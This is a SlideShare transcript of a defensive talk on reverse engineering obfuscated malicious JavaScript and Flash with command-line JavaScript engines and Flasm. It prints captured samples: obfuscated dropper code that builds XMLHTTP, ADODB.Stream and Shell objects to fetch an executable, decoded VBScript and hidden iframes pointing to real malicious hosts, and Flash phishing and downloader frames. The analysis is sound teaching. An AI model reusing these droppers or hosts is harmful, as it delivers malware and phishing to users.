SlideShare a Scribd company logo

Reverse Engineering Malicious Javascript

Y
Yusuf Motiwala

Reverse Engineering Malicious Javascript

Technology
1 of 53
Download to read offline
Reverse Engineering Malicious Javascript Jose Nazario, Ph.D. <jose@arbor.net>
Problem, Solution, You Bad guys want to get malware on your box. They don’t want your security systems to detect their known exploits. So they obfuscate them. By the end of this talk you’ll be armed with techniques to defeat their techniques. arbornetworks.com Page 2 Company Confidential
JavaScript Introduction • Created by Netscape, in almost all browsers now • In-browser scripting • Mix of procedural and OOP • Supports events, regular expressions • Everything is a reference, even functions arbornetworks.com Page 3 Company Confidential
Confusion: Mixed Programming Styles • quot;newquot; keyword to create an object • Nest functions mean classes and methods • Make a function function add(x, y) { return x + y; } arbornetworks.com Page 4 Company Confidential
OOP JavaScript • Make a class with methods function MyNumber() { function add(x, y) { return x + y; } } n = new MyNumber() print(n.add(1, 2)); arbornetworks.com Page 5 Company Confidential
Getting JavaScript to the Browser • Embed in page <script language=quot;JavaScript”> document.write(quot;Hello, world!quot;); </script> • Specify a file to include <script src=quot;path/to/file”></script> arbornetworks.com Page 6 Company Confidential
References • JavaScript Guide – http://wp.netscape.com/eng/mozilla/3.0/handbook/javas cript/ • JavaScript Language Resources – http://developer.mozilla.org/en/docs/JavaScript_L anguage_Resources • JavaScript: The Definitive Guide, Fifth Edition – http://www.oreilly.com/catalog/jscript5/ arbornetworks.com Page 7 Company Confidential
Object Hierarchy • Browser – Window • History • Location • Document arbornetworks.com Page 8 Company Confidential
JavaScript: The Definitive Guide By David Flannagan; ISBN: 1-56592-235-2, 637 pages. Second Edition, January 1997 arbornetworks.com Page 9 Company Confidential
Important Objects • Document – The current HTML – Methods • write() • writeln() • Location – Where you currently are (URL) – Methods • reload() • replace() arbornetworks.com Page 10 Company Confidential
Global Functions We Care About •print() -- print the arguments to stdout •eval() -- treat the arguments as code to execute •encode() -- convert to ASCII %xx expressions •decode() -- convert from ASCII %xx expressions •alert() -- displays a modal browser dialog •+ operator -- concatenate strings (like Java) arbornetworks.com Page 11 Company Confidential
Events We Care About •onLoad() -- execute a code block when the window loads •onUnload() -- execute a code block when the window closes or changes •onSubmit() -- executes a code block when a form is submitted arbornetworks.com Page 12 Company Confidential
What is Malicious JavaScript? • Delivers browser exploits – ADODB.Stream(), setSlice(), etc • Often drops ActiveX/VBScript content • Used to download malware onto the system • Obfuscation to avoid simple signatures arbornetworks.com Page 13 Company Confidential
What is Obfuscated JavaScript? • Simple: JavaScript with opaque code to thwart static review • Hides author’s methods and intents • Varying degrees of obfuscation • FromCode() - Simple ASCII chr(), ord() • Base64 encoding – iWebTool HTML Encrypt • http://www.iwebtool.com/html_encrypter • String splits • Customer encoder – Advanced HTML Protector • http://www.creabit.com/htmlprotect/ arbornetworks.com Page 14 Company Confidential
Simple Base64 Encode arbornetworks.com Page 15 Company Confidential
Simple Decode with NJS • Strip <script> and HTML tags • Change document.write() to print() $ js iweb.js <html> <head> <title>Hello</title> </head> <body> <h1>Hello there.</h1> </body> </html> arbornetworks.com Page 16 Company Confidential
Simple String Join Example function ravlhhwx(zxnkfzz) { gqibom = quot;Gquot;+quot;Equot;+quot;Tquot;; var mjb = quot;http://www.newoldway.info/c/1900/counter21.php?a=3&c=3quot;; runbj = quot;Xquot;+quot;Mquot;+quot;LHquot;+quot;TTPquot;; var gzfzi = zxnkfzz.CreateObject(quot;Scriptiquot;+quot;nquot;+quot;gquot;+quot;.quot;+quot;FileSystquot;+quot;emObjectquot;, quot;quot;) juezny = quot;Shequot;+quot;llquot;; ifhhye = quot;Aquot;+quot;DOquot;+quot;DBquot; vkdvhle = quot;kppoquot;+quot;.exequot;; wrrb = quot;.quot;; jyknv = quot;GETquot;; daxhi = quot;Aquot;+quot;pplicaquot;+quot;tionquot;; vvu = quot;.quot;; rramwz = quot;Squot;+quot;tquot;+quot;rquot;+quot;equot;+quot;amquot;; ybxbb = quot;MSquot;+quot;Xquot;+quot;MLquot;+quot;2quot;; … Simple string splits and joins, builds an AJAX object arbornetworks.com Page 17 Company Confidential
More Complicated Example dF('%2A8HXhwnuy%2A75Qfslzflj%2A8I%2A7%3COf %7BfXhwnuy%2A7%3C%2A8Jithzrjsy3%7Cwnyj%2A7 %3D%2A7%3C%2A8H%2A7Kyj%7Dyfwjf%2A8J%2A%3AH %2A7%3C%2A77%2A8J%2A7%3C%2A7%3E%2A8Gnk%2A7 %3Dithzrjsy3ZWQ3xzgxywnsl%2A7%3D5%2A7H9%2A 7%3E%2A8I%2A8I%2A7%3Cmyyu%2A7%3C%2A7%… What the heck is dF()? A custom decoder. What is this code doing? Let’s find out. arbornetworks.com Page 18 Company Confidential
Two Options … • Manually XOR, mask, array lookup, etc … Or brute force • I chose brute force, I’m lazy • How? Get the JavaScript to the point where the browser could actually use it arbornetworks.com Page 19 Company Confidential
Bad Idea: Using the Browser • Several people like to do this • Wrap questionable JavaScript in <textarea> tags – document.write() will wind up there – eval() will still work • Replace document.write() with alert() – Suggestions from http://handlers.sans.org/dwesemann/decode/index.html • Good luck getting full info from a browser under 0day conditions – Increasing amount of browser-based debugging attacks and defenses arbornetworks.com Page 20 Company Confidential
Better Idea: Divorce the JS Engine from the Browser NJS SpiderMonkey Rhino (Jscript in Java) arbornetworks.com Page 21 Company Confidential
Decoding Malicious JS On The CLI • Cut and paste JavaScript code body or bodies into a file • Strip any extraneous HTML tags – These JS tools don’t understand HTML • Save file • Evaluate with NJS js(1) arbornetworks.com Page 22 Company Confidential
NJS JavaScript Toolkit • NJS is an independent implementation of the JavaScript language developed by Netscape and standardized by ECMA. It is designed to be re-entrant, extendible, fast, and programmable. • http://www.njs-javascript.org/ • Builds on OS X, UNIX, etc … arbornetworks.com Page 23 Company Confidential
Cleaning Up The Mess • Change eval() to print() • Change document.write() to print – Alternatively create a document object with a write() method (equivilent to print()) • Prepend all of the needed bits arbornetworks.com Page 24 Company Confidential
Iterative Example Cut and paste malicious JS body $ cat mal.js var h=quot;+rg&.3fv_m2Hd0P%s)(El=zw>tSnou<- p hy4xBA9W?T6/18… Now try and execute $ js mal.js VM: warning: using undefined global `document' js: evaluation of file `mal.js' failed: StringStream:0: illegal object for call_method arbornetworks.com Page 25 Company Confidential
Iterative Example (cont) $ js mal.js function i(y){var f='',z,q,w,v;for(z=0;z<y.length;z++){q=y. charAt(z);w=h.indexOf(q);if(w>- 1){v=((w+1)%x- 1);if(v<=0){v+=x}f+=h.charAt(v- 1)}else{f+=q}}c+=f};function jjj(){document.write(c);g=quot;quot;} VM: warning: using undefined global `i' js: evaluation of file `mal.js' failed: mal.js:8: illegal function object in jsr arbornetworks.com Page 26 Company Confidential
Iterative Example (cont) • Code in red is a decryptor we need in the page • Cut and paste this function i() into the head of mal.js • Rerun through js(1) arbornetworks.com Page 27 Company Confidential
Iterative Example (concl) $ js mal.js function i(y){var f='',z,q,w,v;for(z=0;z<y.length;z++){q=y.charAt(z);w=h.ind exOf(q);if(w>-1){v=((w+1)%x- 1);if(v<=0){v+=x}f+=h.charAt(v- 1)}else{f+=q}}c+=f};function jjj(){document.write(c);g=quot;quot;} <script language=quot;JavaScriptquot; type=quot;text/javascriptquot;> var vuln_x, vuln_y, vuln_w, vuln_h; function vuln_calc() { var root= document[ (document.compatMode=='CSS1Compat') ? 'documentElement' : 'body' ]; vuln_x= window.screenLeft+68; vuln_y= window.screenTop-19; //vuln_w= 420; vuln_w= root.offsetWidth-220; vuln_h= 17; vuln_show(); }… arbornetworks.com Page 28 Company Confidential
Double Decodes • Clean up HTML • Decode on the CLI • Result: More encoding! • Repeat until it’s not encoded any longer arbornetworks.com Page 29 Company Confidential
Example (Week of March 21, 2007) $ curl http://58.65.239.106/cosmos/gcs_1/ | tee mal.js <script language=JavaScript>function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,23,22,45,3 2,14,57,50,40,62,0,0,0,0,0,0,49,25,24,18,43,16,5,8,30,15, 54,35,17,11,33,56,47,51,41,7,3,58,26,48,0,55,4,0,0,0,0,36 ,0,46,52,37,44,42,21,6,39,19,20,29,34,1,13,27,59,10,61,2, 12,31,60,9,38,53,28);for(j=Math.ceil(l/b);j>0;j-- ){r='';for(i=Math.min(l,b);i>0;i--,l-- ){w|=(t[x.charCodeAt(p++)- 48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>=8;s- =2}else{s=6}}document.write(r)}}makemelaugh(quot;qsq84VRO9ua6 qqr@gizJE59pjsecG1dQiiw84sec6h59KDP0qVv7ZYvYMYvQ1lG08hu7B IdJHKGc4e8lqsU6FpvYg0zrUPdYsuwlsp3YVTANF9R_Z76hZlAxiCOxV7 ANw1zJS1zJFJz7A10xFJvQHi8JsDkctId@Iu6QC0tl4selqeOOt… arbornetworks.com Page 30 Company Confidential
Prepare The Decode function MyDoc () { function write(x) { print(x); } } document = new MyDoc(); // delete HTML tags function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array( 63,23,22,45,32,14,57,50,40,62,0,0,0,0,0,0,49 ,25,24,18,43,16,5,8,30,15,54,35,17,11,33,56, 47,51,41,7,3,58,26,48,0,55,4,0,0,0,0,36,0… arbornetworks.com Page 31 Company Confidential
Execute the Decode $ js mal.js <HTML xmlns:IE> <body> <SCRIPT language=quot;VBScriptquot;> Module_Path=quot;http://58.65.239.106/cosmos/gcs_1/get.php?file=exequot; If navigator.appName=quot;Microsoft Internet Explorerquot; Then If InStr(navigator.platform,quot;Win32quot;) <> 0 Then Const ssfFONTS=20 Const adModeReadWrite=3 Const adTypeBinary=1 Const adSaveCreateOverWrite=2 … arbornetworks.com Page 32 Company Confidential
Refetch, Smaller JScript <script language=JavaScript>function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,15,24 ,60,26,0,2,52,5,42,0,0,0,0,0,0,23,28,58,51,25,39,12, 10,33,17,53,14,29,37,1,46,6,43,4,18,9,62,59,54,30,20 ,47,0,0,0,0,8,0,22,34,7,36,3,41,38,49,27,55,31,32,57 ,21,56,45,40,19,61,13,50,48,35,16,11,44);for(j=Math. ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i-- ,l--){w|=(t[x.charCodeAt(p++)- 48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>= 8;s- =2}else{s=6}}document.write(r)}}makemelaugh(quot;G4Du1rz j1wtMm@FW21sbGKkhkQooBQovDQ_uP@AuN0zCR4DHT0FhX0FWY6quot; )</script> arbornetworks.com Page 33 Company Confidential
Execute … Enjoy! $ js mal1.js <center>Sorry! You IP is blocked.</center> arbornetworks.com Page 34 Company Confidential
Life Isn’t Always This Easy • Lots of defensive JavaScript coming around • Kills all sorts of inspection routines • Don’t run this in the browser! arbornetworks.com Page 35 Company Confidential
Sneaky Example $ wget --user-agent=' ' -m http://www.99express.com/indexxx.html <HTML><SCRIPT LANGUAGE=quot;JavaScriptquot;> <!-- function K508A7(B2B5E7){var H74E49=arguments.callee.toString().replace(/W/g,quot;quot;).to UpperCase();var Q10CCF;var UAC893=H74E49.length;var D9C672;var AEEA53;var R72B7F=quot;quot;;var E9B774=new Array(0,1996959894,3993919788,2567524794,124634137,1886 057615,3915621685,2657392035,249268274,2044508324,37721 15230,2547177864,162941995,2125561021,3887607047,242844 4049,498536548,1789927666,4089016648,2227061214,4505488 61,1843258603,4107580753,2211677639,325883990,168477715 2,4251122042,2321926636,335633487,16613… So far this just looks like a more convoluted encoder arbornetworks.com Page 36 Company Confidential
Decoding Sneaky … Clean up Jscript, remove HTML Execute in js(1) $ js -g indexxx.js js: evaluation of file `indexxx.js' failed: indexxx.js:1: illegal object for call_method What’s wrong? var H74E49= arguments.callee.toString(). replace(/W/g,quot;quot;).toUpperCase(); NJS js(1) doesn’t know about ‘arguments’ arbornetworks.com Page 37 Company Confidential
arguments.callee … • Self reference … callee is a property of the arguments local variable available within all function objects; callee as a property of Function.arguments is no longer used. (Function.arguments itself is also deprecated.) arguments.callee allows anonymous functions to refer to themselves, which is necessary for recursive anonymous functions. • Source: Core JavaScript 1.5 Reference: Functions:arguments:callee, Mozilla website • Often used as a tamper-proof method arbornetworks.com Page 38 Company Confidential
Enter SpiderMonkey • SpiderMonkey is the code-name for the Mozilla's C implementation of JavaScript. • http://www.mozilla.org/js/spidermonkey/ • Builds on UNIX, OS X, etc arbornetworks.com Page 39 Company Confidential
Making Sneaky Work Prepend a working document object (my basic document object doesn’t work with SpiderMonkey) function my_document () { // a property (initialized to string) this.m_property=quot;quot;; this.write=function(string) { print(quot;my_document::writequot;); print(string); } }; // declare a globally-accessible document object var document=new my_document(); From http://www.websense.com/securitylabs/blog/blog.php?BlogID=98 arbornetworks.com Page 40 Company Confidential
Run it Through SpiderMonkey $ cat jose.html | ./js my_document::write </textarea><iframe src=quot;http://ibm- ssl.com:81/cgi-bin/nsp.cgi?p=buyquot; width=1 height=1 style=quot;border: 0pxquot;></iframe> • Notice the close textarea tag • Code also will barf on alert() • Notice that the decode array expected the full decode function • Cannot mess with it via print() or alert()! arbornetworks.com Page 41 Company Confidential
Sometimes We Need Other Tools • Sometimes NJS js(1) will barf on some character codes • What do we do? We call out to another language • I like Python so … • s = <array of numbers as a Python tuple> • … for i in s: r += chr(s) … arbornetworks.com Page 42 Company Confidential
Malicious JScript in the Large • NeoSploit • Similar to Web Attacker framework • Lots of exploits • Enumerates vulnerable components – Web browser – Accessible CLSIDs – At least 7 different exploits • Fingerprints you quickly • Launches the right exploit arbornetworks.com Page 43 Company Confidential
Where We See This Stuff Day to Day • Feebs worm – Convoluted JavaScript body drops a VBScript malware reassembler • ADODB.Stream() exploits – Usually grab a first stage EXE • Other ActiveX exploits – Often mutliple CLSIDs stacked in one malicious web page arbornetworks.com Page 44 Company Confidential
Tools and Tips • curl(1) and wget(1) are your friend – Learn how to set your own Referrer and User-Agent fields • Don’t use a vulnerable browser when you’re doing this work • tee(1) or script(1) most of your cmdline work • My favorite platforms: UNIX, OS X arbornetworks.com Page 45 Company Confidential
Unsolved Problems • No complement to js(1) for VBScript … anyone? – Suggestion: WINE with cscript.exe • RELIABLE generic detection – IDS, IPS sigs – Browser plugins • Non-browser based honeyclients don’t understand JS – Bolt in SpiderMonkey C bindings? arbornetworks.com Page 46 Company Confidential
Bonus Material: Flash Malware • Flash can contain JavaScript actions within • These JavaScript actions can affect the browser • Tool of choice: Flasm – Flasm is a free command line assembler/disassembler of Flash ActionScript bytecode. – http://flasm.sourceforge.net/ arbornetworks.com Page 47 Company Confidential
Phlash Redirection Real Example from December 10, 2006 http://i127.photobucket.com/albums/p126/click2es/prize.swf $ flasm -d /home/jose/malware/10dec06/i127.photobucket.com/albums/p126/c lick2es/prize.swf Flasm configuration file flasm.ini not found, using default values movie '/home/jose/ … /prize.swf' compressed // flash 6, total frames: 1, frame rate: 12 fps, 50x40 px frame 0 getURL 'http://www.fair- faxy.com/Signin.eBay.com.ws.eBayISAPI.dslSignInco.partnerId.p UserId.siteid.pageType.pa1.i1.BshowGif.UsingSSL.https.ebay.co m.pa2.errmsg.runame.ruparams.ruproduct.sid.confirm5.htm' '_self' end // of frame 0 end arbornetworks.com Page 48 Company Confidential
Flash Exploit Downloader 22:45:30 < dfx> http://hiltonfreak.tripod.com/parishilton.swf frame 156 Downloads IRC Bot getURL 'javaplugin.zip' '_top' end // of frame 156 Archive: hiltonfreak.tripod.com/javaplugin.zip Length Date Time Name -------- ---- ---- ---- 13624 04-13-07 22:13 readme.txt 60960 04-13-07 21:44 javaplugin.exe -------- ------- arbornetworks.com Page 49 Company Confidential
Phishing in Flash • Call out to web components to build what appears to be a legit site • All run within a Flash object • Intercept data, process and steal • Huge decodes, but Flasm shows how it’s done arbornetworks.com Page 50 Company Confidential
Phlash Phishing 19 March 2007: http://200.29.161.100/1/capital2.swf … defineButton 164 on overDownToOverUp getURL 'http://www.capitalone.com/' '_blank' end end // of defineButton 164 defineButton 165 on overDownToOverUp getURL 'http://www.capitalone.com/legal/privacy.php' '_blank' end end // of defineButton 165 … arbornetworks.com Page 51 Company Confidential
Back to JavaScript • The bad guys are using JavaScript as their delivery vehicle • JavaScript: Learn it, love it • They’re limited by the fact that the JavaScript has to be decoded to be used by the browser • Their obfuscation tools are primitive but effective – But they require a human to analyze • They’ll continue to push the envelope – Malware2.0? arbornetworks.com Page 52 Company Confidential
Thank You Acknowledgements • A (wishes to remain anonymous) • Websense guys • Ken Dunham @ iDef • Joe Stewart @ SecureWorx • You arbornetworks.com Page 53 Company Confidential

Recommended

hacking with node.JS
hacking with node.JShacking with node.JS
hacking with node.JSHarsha Vashisht
 
Rust
RustRust
RustChih-Hsuan Kuo
 
An introduction to Rust: the modern programming language to develop safe and ...
An introduction to Rust: the modern programming language to develop safe and ...An introduction to Rust: the modern programming language to develop safe and ...
An introduction to Rust: the modern programming language to develop safe and ...Claudio Capobianco
 
Node js crash course session 1
Node js crash course session 1Node js crash course session 1
Node js crash course session 1Abdul Rahman Masri Attal
 
HTML5 & CSS3 : Jeux
HTML5 & CSS3 : Jeux HTML5 & CSS3 : Jeux
HTML5 & CSS3 : Jeux Ghodhbane Mohamed Amine
 
Rust: Unlocking Systems Programming
Rust: Unlocking Systems ProgrammingRust: Unlocking Systems Programming
Rust: Unlocking Systems ProgrammingC4Media
 
Impact of the New ORM on Your Modules
Impact of the New ORM on Your ModulesImpact of the New ORM on Your Modules
Impact of the New ORM on Your ModulesOdoo
 
.NET最先端技術によるハイパフォーマンスウェブアプリケーション
.NET最先端技術によるハイパフォーマンスウェブアプリケーション.NET最先端技術によるハイパフォーマンスウェブアプリケーション
.NET最先端技術によるハイパフォーマンスウェブアプリケーションYoshifumi Kawai
 

Recommended

hacking with node.JS
hacking with node.JShacking with node.JS
hacking with node.JSHarsha Vashisht
 
Rust
RustRust
RustChih-Hsuan Kuo
 
An introduction to Rust: the modern programming language to develop safe and ...
An introduction to Rust: the modern programming language to develop safe and ...An introduction to Rust: the modern programming language to develop safe and ...
An introduction to Rust: the modern programming language to develop safe and ...Claudio Capobianco
 
Node js crash course session 1
Node js crash course session 1Node js crash course session 1
Node js crash course session 1Abdul Rahman Masri Attal
 
HTML5 & CSS3 : Jeux
HTML5 & CSS3 : Jeux HTML5 & CSS3 : Jeux
HTML5 & CSS3 : Jeux Ghodhbane Mohamed Amine
 
Rust: Unlocking Systems Programming
Rust: Unlocking Systems ProgrammingRust: Unlocking Systems Programming
Rust: Unlocking Systems ProgrammingC4Media
 
Impact of the New ORM on Your Modules
Impact of the New ORM on Your ModulesImpact of the New ORM on Your Modules
Impact of the New ORM on Your ModulesOdoo
 
.NET最先端技術によるハイパフォーマンスウェブアプリケーション
.NET最先端技術によるハイパフォーマンスウェブアプリケーション.NET最先端技術によるハイパフォーマンスウェブアプリケーション
.NET最先端技術によるハイパフォーマンスウェブアプリケーションYoshifumi Kawai
 
Node.js Basics
Node.js Basics Node.js Basics
Node.js Basics TheCreativedev Blog
 
MongoDB Aggregation Performance
MongoDB Aggregation PerformanceMongoDB Aggregation Performance
MongoDB Aggregation PerformanceMongoDB
 
Node.js and the MySQL Document Store
Node.js and the MySQL Document StoreNode.js and the MySQL Document Store
Node.js and the MySQL Document StoreRui Quelhas
 
libuv, NodeJS and everything in between
libuv, NodeJS and everything in betweenlibuv, NodeJS and everything in between
libuv, NodeJS and everything in betweenSaúl Ibarra Corretgé
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node jsAkshay Mathur
 
Is Rust Programming ready for embedded development?
Is Rust Programming ready for embedded development?Is Rust Programming ready for embedded development?
Is Rust Programming ready for embedded development?Knoldus Inc.
 
Puppeteer - A web scraping & UI Testing Tool
Puppeteer - A web scraping & UI Testing ToolPuppeteer - A web scraping & UI Testing Tool
Puppeteer - A web scraping & UI Testing ToolMiki Lombardi
 
The Rust Programming Language: an Overview
The Rust Programming Language: an OverviewThe Rust Programming Language: an Overview
The Rust Programming Language: an OverviewRoberto Casadei
 
Vue.js
Vue.jsVue.js
Vue.jsJadson Santos
 
Dart のコード自動生成の仕組みと、コード自動生成のパッケージを自作する方法について
Dart のコード自動生成の仕組みと、コード自動生成のパッケージを自作する方法についてDart のコード自動生成の仕組みと、コード自動生成のパッケージを自作する方法について
Dart のコード自動生成の仕組みと、コード自動生成のパッケージを自作する方法についてKosuke Saigusa
 
Golang Project Layout and Practice
Golang Project Layout and PracticeGolang Project Layout and Practice
Golang Project Layout and PracticeBo-Yi Wu
 
MongoDB .local Toronto 2019: Tips and Tricks for Effective Indexing
MongoDB .local Toronto 2019: Tips and Tricks for Effective IndexingMongoDB .local Toronto 2019: Tips and Tricks for Effective Indexing
MongoDB .local Toronto 2019: Tips and Tricks for Effective IndexingMongoDB
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
Linux Kernel vs DPDK: HTTP Performance Showdown
Linux Kernel vs DPDK: HTTP Performance ShowdownLinux Kernel vs DPDK: HTTP Performance Showdown
Linux Kernel vs DPDK: HTTP Performance ShowdownScyllaDB
 
Complete MVC on NodeJS
Complete MVC on NodeJSComplete MVC on NodeJS
Complete MVC on NodeJSHüseyin BABAL
 
Rust Programming Language
Rust Programming LanguageRust Programming Language
Rust Programming LanguageJaeju Kim
 
Working with JSON Data in PostgreSQL vs. MongoDB
Working with JSON Data in PostgreSQL vs. MongoDBWorking with JSON Data in PostgreSQL vs. MongoDB
Working with JSON Data in PostgreSQL vs. MongoDBScaleGrid.io
 
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMUSFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMULinaro
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Node.js Express
Node.js ExpressNode.js Express
Node.js ExpressEyal Vardi
 
Il Diritto d'autore ad uso dei blogger. Le slide della seconda lezione
Il Diritto d'autore ad uso dei blogger. Le slide della seconda lezioneIl Diritto d'autore ad uso dei blogger. Le slide della seconda lezione
Il Diritto d'autore ad uso dei blogger. Le slide della seconda lezioneElena Trombetta
 
Google
GoogleGoogle
Googlesunil sharma
 

More Related Content

What's hot

MongoDB Aggregation Performance
MongoDB Aggregation PerformanceMongoDB Aggregation Performance
MongoDB Aggregation PerformanceMongoDB
 
Node.js and the MySQL Document Store
Node.js and the MySQL Document StoreNode.js and the MySQL Document Store
Node.js and the MySQL Document StoreRui Quelhas
 
libuv, NodeJS and everything in between
libuv, NodeJS and everything in betweenlibuv, NodeJS and everything in between
libuv, NodeJS and everything in betweenSaúl Ibarra Corretgé
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node jsAkshay Mathur
 
Is Rust Programming ready for embedded development?
Is Rust Programming ready for embedded development?Is Rust Programming ready for embedded development?
Is Rust Programming ready for embedded development?Knoldus Inc.
 
Puppeteer - A web scraping & UI Testing Tool
Puppeteer - A web scraping & UI Testing ToolPuppeteer - A web scraping & UI Testing Tool
Puppeteer - A web scraping & UI Testing ToolMiki Lombardi
 
The Rust Programming Language: an Overview
The Rust Programming Language: an OverviewThe Rust Programming Language: an Overview
The Rust Programming Language: an OverviewRoberto Casadei
 
Dart のコード自動生成の仕組みと、コード自動生成のパッケージを自作する方法について
Dart のコード自動生成の仕組みと、コード自動生成のパッケージを自作する方法についてDart のコード自動生成の仕組みと、コード自動生成のパッケージを自作する方法について
Dart のコード自動生成の仕組みと、コード自動生成のパッケージを自作する方法についてKosuke Saigusa
 
Golang Project Layout and Practice
Golang Project Layout and PracticeGolang Project Layout and Practice
Golang Project Layout and PracticeBo-Yi Wu
 
MongoDB .local Toronto 2019: Tips and Tricks for Effective Indexing
MongoDB .local Toronto 2019: Tips and Tricks for Effective IndexingMongoDB .local Toronto 2019: Tips and Tricks for Effective Indexing
MongoDB .local Toronto 2019: Tips and Tricks for Effective IndexingMongoDB
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
Linux Kernel vs DPDK: HTTP Performance Showdown
Linux Kernel vs DPDK: HTTP Performance ShowdownLinux Kernel vs DPDK: HTTP Performance Showdown
Linux Kernel vs DPDK: HTTP Performance ShowdownScyllaDB
 
Complete MVC on NodeJS
Complete MVC on NodeJSComplete MVC on NodeJS
Complete MVC on NodeJSHüseyin BABAL
 
Rust Programming Language
Rust Programming LanguageRust Programming Language
Rust Programming LanguageJaeju Kim
 
Working with JSON Data in PostgreSQL vs. MongoDB
Working with JSON Data in PostgreSQL vs. MongoDBWorking with JSON Data in PostgreSQL vs. MongoDB
Working with JSON Data in PostgreSQL vs. MongoDBScaleGrid.io
 
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMUSFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMULinaro
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Node.js Express
Node.js ExpressNode.js Express
Node.js ExpressEyal Vardi
 

What's hot (20)

Node.js Basics
Node.js Basics Node.js Basics
Node.js Basics
 
MongoDB Aggregation Performance
MongoDB Aggregation PerformanceMongoDB Aggregation Performance
MongoDB Aggregation Performance
 
Node.js and the MySQL Document Store
Node.js and the MySQL Document StoreNode.js and the MySQL Document Store
Node.js and the MySQL Document Store
 
libuv, NodeJS and everything in between
libuv, NodeJS and everything in betweenlibuv, NodeJS and everything in between
libuv, NodeJS and everything in between
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node js
 
Is Rust Programming ready for embedded development?
Is Rust Programming ready for embedded development?Is Rust Programming ready for embedded development?
Is Rust Programming ready for embedded development?
 
Puppeteer - A web scraping & UI Testing Tool
Puppeteer - A web scraping & UI Testing ToolPuppeteer - A web scraping & UI Testing Tool
Puppeteer - A web scraping & UI Testing Tool
 
The Rust Programming Language: an Overview
The Rust Programming Language: an OverviewThe Rust Programming Language: an Overview
The Rust Programming Language: an Overview
 
Vue.js
Vue.jsVue.js
Vue.js
 
Dart のコード自動生成の仕組みと、コード自動生成のパッケージを自作する方法について
Dart のコード自動生成の仕組みと、コード自動生成のパッケージを自作する方法についてDart のコード自動生成の仕組みと、コード自動生成のパッケージを自作する方法について
Dart のコード自動生成の仕組みと、コード自動生成のパッケージを自作する方法について
 
Golang Project Layout and Practice
Golang Project Layout and PracticeGolang Project Layout and Practice
Golang Project Layout and Practice
 
MongoDB .local Toronto 2019: Tips and Tricks for Effective Indexing
MongoDB .local Toronto 2019: Tips and Tricks for Effective IndexingMongoDB .local Toronto 2019: Tips and Tricks for Effective Indexing
MongoDB .local Toronto 2019: Tips and Tricks for Effective Indexing
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
Linux Kernel vs DPDK: HTTP Performance Showdown
Linux Kernel vs DPDK: HTTP Performance ShowdownLinux Kernel vs DPDK: HTTP Performance Showdown
Linux Kernel vs DPDK: HTTP Performance Showdown
 
Complete MVC on NodeJS
Complete MVC on NodeJSComplete MVC on NodeJS
Complete MVC on NodeJS
 
Rust Programming Language
Rust Programming LanguageRust Programming Language
Rust Programming Language
 
Working with JSON Data in PostgreSQL vs. MongoDB
Working with JSON Data in PostgreSQL vs. MongoDBWorking with JSON Data in PostgreSQL vs. MongoDB
Working with JSON Data in PostgreSQL vs. MongoDB
 
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMUSFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
Node.js Express
Node.js ExpressNode.js Express
Node.js Express
 

Viewers also liked

Il Diritto d'autore ad uso dei blogger. Le slide della seconda lezione
Il Diritto d'autore ad uso dei blogger. Le slide della seconda lezioneIl Diritto d'autore ad uso dei blogger. Le slide della seconda lezione
Il Diritto d'autore ad uso dei blogger. Le slide della seconda lezioneElena Trombetta
 
How The Open Data Community Died - A Warning From The Future
How The Open Data Community Died - A Warning From The FutureHow The Open Data Community Died - A Warning From The Future
How The Open Data Community Died - A Warning From The FutureChris Taggart
 
Metastore ECM verhuist naar Rijen (NB)
Metastore ECM verhuist naar Rijen (NB)Metastore ECM verhuist naar Rijen (NB)
Metastore ECM verhuist naar Rijen (NB)Jack Warnars
 
Pla estrategic La salle Alumni 2012 2014
Pla estrategic La salle Alumni 2012 2014Pla estrategic La salle Alumni 2012 2014
Pla estrategic La salle Alumni 2012 2014LaSalleAlumni
 
Mejores aviones comerciales1
Mejores aviones comerciales1Mejores aviones comerciales1
Mejores aviones comerciales1Janpier R. Fabian
 
Sintesis informativa 15 de febrero 2013
Sintesis informativa 15 de febrero 2013Sintesis informativa 15 de febrero 2013
Sintesis informativa 15 de febrero 2013megaradioexpress
 
About Galgotia University | Education and Placements
About Galgotia University | Education and PlacementsAbout Galgotia University | Education and Placements
About Galgotia University | Education and PlacementsGalgotia University
 
Presentación EETAC2Travel
